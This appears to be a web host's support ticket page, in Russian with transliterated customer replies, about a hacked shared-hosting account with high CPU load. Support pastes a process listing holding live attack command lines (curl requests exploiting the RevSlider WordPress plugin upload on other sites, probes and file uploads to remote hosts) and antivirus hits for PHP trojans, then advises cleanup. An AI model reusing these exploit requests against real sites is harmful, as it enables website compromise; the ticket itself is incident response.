Варианты решения Ваших вопросов

  хостинг
<< Назад       hosting

Вопрос: CPU Usage 92 / 100 %
Ответ:

что вы запустили?


tural147 140559 0.0 0.0 129672 13340 ? S 14:39 0:00 cpaneld - serving 81.21. --llu=1422450509 --listen=3,4,5,6,7,8,9,10
tural147 141616 0.0 0.0 75644 3164 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10 -A Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) --request GET http://rtlpalvelut.fi//index.php -o tmp/faxfqzulpvntykdyezebcvuln
tural147 141811 0.0 0.0 75644 3164 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10 -A Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) --request GET http://www.stcatharinesstandard.ca//index.php -o tmp/ooxaklcyooaoykgpdbsycvuln
tural147 142268 0.0 0.0 75644 3124 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10 -A Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) -H Cookie :"" -H Content_Type :form-data -F action=revslider_ajax_action -F client_action=update_plugin -F update_file=@revslider.zip --request POST http://www.lsbankchina.com//wp-admin/admin-ajax.php -o tmp/ismxkdbgxspxodgctihwwprev
tural147 142714 0.0 0.0 75644 3204 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10 -A Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) -H Cookie :"" -H Content_Type :form-data -F action=revslider_ajax_action -F client_action=update_plugin -F update_file=@revslider.zip --request POST http://www.xn--aktieportefljen-gub.dk//wp-admin/admin-ajax.php -o tmp/yyvpstzvdeaxgrgkacgpwprev
tural147 142815 0.0 0.0 4076 544 ? S 14:39 0:00 sleep 1
tural147 142817 0.0 0.0 4076 544 ? S 14:39 0:00 sleep 1
tural147 142851 0.0 0.0 75644 3184 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10 -A Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) http://karate.gibopaint.com/nyet.gif -o tmp/qiwbqnqxahmnkmthhdbcgck.txt
tural147 142858 0.0 0.0 4076 540 ? S 14:39 0:00 sleep 1
tural147 142871 0.0 0.0 75644 3184 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10 -A Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) http://www.yamashinakensetsu.co.jp/nyet.gif -o tmp/smjofprupolupmcewmwjgck.txt
tural147 142875 0.0 0.0 75644 3192 ? S 14:39 0:00 curl --silent --max-time 10 --connect-timeout 10 -o tmp/saizycndsijjdyuxnlwvresp.txt -H User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:IP) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729) -H Accept-Language: en-us,en;q=0.5 -H Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 -T nyet.gif http://www.semanariocentro.com.uy/
tural147 142897 0.0 0.0 0 0 ? Z 14:39 0:00 [cat] <defunct>
tural147 142900 0.0 0.0 4076 540 ? S 14:39 0:00 sleep 1
tural147 142901 0.0 0.0 4076 544 ? S 14:39 0:00 sleep 1
tural147 142918 0.0 0.0 0 0 ? R 14:39 0:00 [bash]
tural147 142922 0.0 0.0 0 0 ? Z 14:39 0:00 [cat] <defunct>
tural147 142924 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142925 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142935 0.0 0.0 4076 544 ? S 14:39 0:00 sleep 1
tural147 142937 0.0 0.0 17800 7040 ? R 14:39 0:00 bash apache2 fr,de,hr,cs,sl
tural147 142938 0.0 0.0 16788 5928 ? R 14:39 0:00 bash apache2 sr,sk,sv,th,ar
tural147 142939 0.0 0.0 4076 544 ? S 14:39 0:00 sleep 1
tural147 142945 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142946 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142948 0.0 0.0 0 0 ? Z 14:39 0:00 [cat] <defunct>
tural147 142950 0.0 0.0 0 0 ? Z 14:39 0:00 [cat] <defunct>
tural147 142955 0.0 0.0 17164 6340 ? R 14:39 0:00 bash apache2 en,et,fa,pl
tural147 142957 0.0 0.0 0 0 ? Z 14:39 0:00 [cut] <defunct>
tural147 142960 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142961 0.0 0.0 0 0 ? Z 14:39 0:00 [cat] <defunct>
tural147 142962 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142965 0.0 0.0 0 0 ? Z 14:39 0:00 [awk] <defunct>
tural147 142966 0.0 0.0 0 0 ? Z 14:39 0:00 [cut] <defunct>
tural147 142967 0.0 0.0 17164 5936 ? R 14:39 0:00 bash apache2 en,et,fa,pl
tural147 142968 0.0 0.0 20416 9292 ? R 14:39 0:00 bash apache2 ms,nb,pt_BR,pt_PT,ru
tural147 142969 0.0 0.0 16624 5400 ? R 14:39 0:00 bash apache2 sr,sk,sv,th,ar
tural147 142970 0.0 0.0 16624 5400 ? R 14:39 0:00 bash apache2 sr,sk,sv,th,ar
root 142972 0.0 0.0 103252 884 pts/0 S+ 14:39 0:00 grep tural147
tural147 776645 0.3 0.0 22000 11828 ? S Feb01 4:25 bash apache2 sr,sk,sv,th,ar
tural147 776669 0.3 0.0 22000 11840 ? S Feb01 4:24 bash apache2 tr,vi,uk,fi
tural147 776732 0.3 0.0 22000 11828 ? S Feb01 4:24 bash apache2 da,nl,el,he,eg
tural147 776757 0.3 0.0 22000 11832 ? S Feb01 4:24 bash apache2 en,et,fa,pl
tural147 776794 0.3 0.0 22000 12092 ? S Feb01 4:23 bash apache2 fr,de,hr,cs,sl
tural147 776819 0.3 0.0 22000 12100 ? S Feb01 4:23 bash apache2 hu,is,id,it,es
tural147 776848 0.3 0.0 22000 11844 ? S Feb01 4:24 bash apache2 ja,ko,lv,lt,ro
tural147 776877 0.2 0.0 20416 10516 ? S Feb01 2:46 bash apache2 ms,nb,pt_BR,pt_PT,ru
tural147 777397 1.6 0.0 16624 6152 ? S Feb01 21:08 bash apache2 sr,sk,sv,th,ar
tural147 777398 1.7 0.0 16788 6340 ? S Feb01 22:28 bash apache2 sr,sk,sv,th,ar
tural147 777425 1.8 0.0 16916 6472 ? S Feb01 23:33 bash apache2 tr,vi,uk,fi
tural147 777426 2.3 0.0 17312 6840 ? R Feb01 29:03 bash apache2 tr,vi,uk,fi
tural147 777428 3.0 0.0 17948 7464 ? S Feb01 38:40 bash apache2 da,nl,el,he,eg
tural147 777429 3.2 0.0 18172 7664 ? S Feb01 41:12 bash apache2 da,nl,el,he,eg
tural147 777468 2.1 0.0 17352 6916 ? S Feb01 27:42 bash apache2 en,et,fa,pl
tural147 777469 1.9 0.0 17164 6684 ? R Feb01 24:16 bash apache2 en,et,fa,pl
tural147 777471 1.4 0.0 16492 6084 ? S Feb01 18:34 bash apache2 ja,ko,lv,lt,ro
tural147 777472 1.7 0.0 16744 6312 ? S Feb01 22:03 bash apache2 ja,ko,lv,lt,ro
tural147 777504 2.6 0.0 17800 7452 ? S Feb01 33:41 bash apache2 fr,de,hr,cs,sl
tural147 777505 2.4 0.0 17600 7284 ? R Feb01 31:07 bash apache2 fr,de,hr,cs,sl
tural147 777507 2.1 0.0 17284 6928 ? R Feb01 27:33 bash apache2 hu,is,id,it,es
tural147 777508 2.0 0.0 17100 6836 ? R Feb01 25:58 bash apache2 hu,is,id,it,es
tural147 777558 2.8 0.0 17880 7512 ? S Feb01 36:23 bash apache2 ms,nb,pt_BR,pt_PT,ru
tural147 989434 0.0 0.0 23292 2432 ? S 14:20 0:00 dovecot/imap

Вопрос: da
Ответ:

что означает - da?  что Вы запустили? ответьте на вопрос

Ответ:


/home/tural147/public_html/compinter.net/wp-admin/css/search.php: PHP.Agent-20 FOUND
/home/tural147/public_html/baubaspa.com/wp-admin/css/colors/ocean/ms-settings.php: PHP.Agent-20 FOUND
/home/tural147/wp-conf.php: Trojan.PHP-43 FOUND
/home/tural147/public_html/concordgroup.az/wp-content/plugins/revslider/temp/update_extract/revslider.zip: PHP.Hide FOUND
/home/tural147/public_html/concordgroup.az/wp-content/plugins/revslider/temp/update_extract/revslider.zip: PHP.Hide FOUND

Вопрос: spasiba
Ответ:

незачто. но у вас серьезная проблема по Вашей вине. вы использовали уязвимый плагин и ваш сайт был взломан

http://1ps.ru/blog/sites/virus-soaksoak-atakuet-sajtyi-pod-upravleniem-cms-wordpress/ теперь вам нужно принять меры по очистке сайта.

доступ к сайту открыт только для вашего ip

Вопрос: znacit teper krome menya nikto ne smojet voyti v sayt?
Ответ:

пока вы не очистите ого отвирусов - нет. у вас серьезная проблема, ваши сайты взломаны. лучше пусть пока никто не войдет к вам на сайт чем поисковики не будут вообще пускать к вам на сайт из за вирусов.

Ответ:

сайт yildiz.az у вас вообще один сплошной вирус

Вопрос: bubaspa eto papka i v nacale pustaya bila pojalyusta kontroliruyte snova
Ответ:

ваши сайты заражены. причина взлома- уязвимый плагин. примите меры по очистке сайтов

Вопрос: a vi mojete mne poslat zarajennie papki?
Ответ:

нет, мы не отсылаем файлы. у вас есть реквизиты ftp вы можете скачать файлы самостоятельно

 

Вопрос: izvinite ya imel vvedu linki papki naprimer /home/tural147/public_html/compinter.net/wp-admin/css/search.php: PHP.Agent-20 FOUND
Ответ:

 

все сайты  и файлы нужно проверять, абсолютно все Вам привели ссылку на описание проблемы

http://1ps.ru/blog/sites/virus-soaksoak-atakuet-sajtyi-pod-upravleniem-cms-wordpress/

 Либо проверять каждый файл либо создать сайты заново

 

Вопрос: .trash baubaspa.com compinter.net ne utadilit papki
Ответ:

.trash - это системная папка, ее нельзя трогать

Вопрос: public_html/concordgroup.az/wp-content/plugins/revslider/temp/update_extract ne udalit papki
Ответ:

вы хотите что бы мы пересоздали Вам аккаунт?

Вопрос: ya imeyu vvedu ctobi vi mne poslali link zarejennix papok
Вопрос: ya otpravil vam fayli kotorie ne udalennie
Ответ:

каким образом вы отправляли? какие файлы? вы все файлы всех сайтов проверили?

Вопрос: ya vam otpravil fayli kotorie ne vozmojno udalit public_html/concordgroup.az/wp-content/plugins/revslider/temp/update_extract prasu vas ctobi vi ix udalili = update_extract
Ответ:

вам удалитьпапку ublic_html/concordgroup.az/wp-content/plugins/revslider/temp/update_extract ? но это не решит проблемы

Вопрос: a vozmojno li sayt vernut v tu datu koqda sayt ne bil vzloman? normalno rabotal
Вопрос: a vozmojno li sayt vernut v tu datu koqda sayt ne bil vzloman? normalno rabotal
Ответ:

 

нам не известно когда он был взломан, у вас есть зараженые файлы за 26 января, за эту дату у нас уже нет бекапов. кроме того, если вернуть то он будет взломан снова.

мы рекомендуем Вам сделать полный бекап, скачать его на компьютер а потом пересоздать все сайты заново. Не используя непроверные плагины и темы из неофициальных источников

 

Вопрос: pojalyusta posledniy raz vi so svoimi antivirisami skaniruyte sayt i poslite nam zarejennie linki
Ответ:

наши антивирусы не находят эти файлы , мы уже несколько раз сканировали. кроме того антивирусы автоматически сканируют весь сервер каждые несколько дней.

Вопрос: vi obyasnite nam kak polniy back up sdelat?
Ответ:

заходите в панель управления , меню - резервные копии- полная резервная копия. делаете полную резервную копию и потом скачиваете файл на компьютер


http://ded07.net/ помощь по пользованию панелью


<< Назад